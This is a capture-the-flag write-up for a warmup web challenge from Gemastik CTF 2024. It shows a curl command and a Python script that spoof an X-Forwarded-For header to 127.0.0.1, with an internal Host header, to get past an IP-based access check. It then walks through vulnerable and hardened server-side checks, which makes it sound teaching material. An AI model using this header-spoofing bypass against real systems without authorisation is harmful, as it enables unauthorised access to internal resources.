Warmup
Gemastik CTF 2024 (UNNES) warmup writeup.
1. Internal Page (Web - Easy)
1.1. Description
As the title says, this challenge is a warmup: send a request to the internal virtual host of the Gemastik challenge website. The server apparently decides whether a request is "internal" from the X-Forwarded-For header, which the client writes, so adding X-Forwarded-For: 127.0.0.1 (together with the internal Host header) makes the request look as if it came from localhost. Any access check that trusts this header without verifying that it was set by a known reverse proxy can be bypassed the same way.
1.2. POC using cURL
curl -H "Host: internal.gemastik" -H "X-Forwarded-For: 127.0.0.1" ctf.gemastik.id:9005
1.3. POC using Python
#!/usr/bin/env python3
import requests

URL: str = "http://ctf.gemastik.id:9005"
# Host selects the internal virtual host; X-Forwarded-For is the spoofed source address.
headers: dict = {"Host": "internal.gemastik.puspresnas.go.id", "X-Forwarded-For": "127.0.0.1"}
response: requests.Response = requests.get(URL, headers=headers)
status_code: int = response.status_code
if status_code == 200:
    print(response.text)  # response body (the original used response.txt, which does not exist)
    print(response.headers)
else:
    print("Failed!")
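To show why the header trick above works and what the fix looks like, here is an added example (not code from the challenge or its authors) that simulates the server-side check. The trusted proxy address 10.0.0.5 and the client addresses are constructed for the demo; the vulnerable check believes the leftmost X-Forwarded-For hop, while the hardened version walks the chain from the TCP peer leftwards and discards only hops that belong to known proxies.

```python
#!/usr/bin/env python3
"""Simulated 'is this request internal?' check: vulnerable vs hardened.

Added example, not part of the original writeup. All addresses below are
constructed for the demonstration.
"""
import ipaddress
from typing import Dict, FrozenSet, List, Union

IPAddr = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]

# Constructed value: the only reverse proxy that may legitimately append XFF hops.
TRUSTED_PROXIES: FrozenSet[IPAddr] = frozenset({ipaddress.ip_address("10.0.0.5")})


def _split_xff(headers: Dict[str, str]) -> List[str]:
    """Return X-Forwarded-For hops, leftmost = oldest claim, rightmost = newest."""
    raw = headers.get("X-Forwarded-For", "")
    return [hop.strip() for hop in raw.split(",") if hop.strip()]


def is_internal_vulnerable(remote_addr: str, headers: Dict[str, str]) -> bool:
    """Flawed check: trusts the leftmost hop, which is whatever the client sent."""
    hops = _split_xff(headers)
    claimed = hops[0] if hops else remote_addr
    return claimed == "127.0.0.1"


def client_ip_hardened(remote_addr: str, headers: Dict[str, str],
                       trusted_proxies: FrozenSet[IPAddr] = TRUSTED_PROXIES) -> IPAddr:
    """Return the real client address.

    The TCP peer (remote_addr) is the only hop the server observed itself. Each
    trusted proxy appends the peer it saw, so walking the chain right-to-left and
    skipping trusted proxies lands on the real client; everything further left
    is client-controlled text and is ignored. An unparseable hop aborts the walk
    and the TCP peer is returned, which never grants 'internal' to a remote host.
    """
    peer = ipaddress.ip_address(remote_addr)
    chain = _split_xff(headers) + [remote_addr]
    for hop in reversed(chain):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return peer  # garbage in the header: fall back to the TCP peer
        if addr in trusted_proxies:
            continue
        return addr
    return peer  # every hop was a trusted proxy


def is_internal_hardened(remote_addr: str, headers: Dict[str, str],
                         trusted_proxies: FrozenSet[IPAddr] = TRUSTED_PROXIES) -> bool:
    """Hardened check: only a loopback address derived from observed hops counts."""
    return client_ip_hardened(remote_addr, headers, trusted_proxies).is_loopback


if __name__ == "__main__":
    spoof = {"X-Forwarded-For": "127.0.0.1"}
    # Direct connection from an attacker with the spoofed header, as in the PoC.
    print("vulnerable:", is_internal_vulnerable("203.0.113.9", spoof))
    print("hardened:  ", is_internal_hardened("203.0.113.9", spoof))
    # Same attack through the real proxy, which appends the attacker's address.
    via_proxy = {"X-Forwarded-For": "127.0.0.1, 203.0.113.9"}
    print("via proxy: ", is_internal_hardened("10.0.0.5", via_proxy))
```

The hardened version still honours a loopback hop when it was appended by the trusted proxy itself (the proxy actually saw a local connection), which is the behaviour a legitimate internal client needs; it just refuses to believe any hop the server or its proxies did not observe.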
Other Warmup Challenges
All warmup challenges can be seen at the following URL:
https://oto.lv.tab.digital/s/sSwGJYxbYdrj3qN
Tags: #ctf, #web, #warmup